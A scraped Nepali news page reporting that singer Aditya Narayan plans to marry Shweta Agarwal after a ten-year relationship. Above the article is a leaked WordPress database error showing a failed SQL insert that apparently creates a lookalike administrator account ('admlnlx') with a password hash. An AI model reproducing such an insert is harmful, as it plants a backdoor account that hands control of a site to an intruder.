WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BkhpZ2ldQ8dGjYLLEWxWCrLjdy4r2R0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-28 16:01:10', '', 'admlnlx', 'admlnlx')
गायक आदित्य नारायण आफ्नो प्रेमिका श्वेता अग्रवालसँग यस बर्षको अन्त्यमा बन्धनमा बाँध्ने तयारीमा रहेका छन्।
यो भन्दा अगाडी चारवटा फिल्ममा काम गरिसकेका छन । विक्रम भाटद्धारा निर्देशित शापित फिल्ममा आदित्य संगै काम गरेर नजिक भएका उनीहरु निरन्तर दश वर्ष लभ अफेयरमा रहेका थिए ।
आदित्यको परिवारमा पनि रामो चिनजान भएकोले सजिलो भएको आदित्यले वताएका छन ।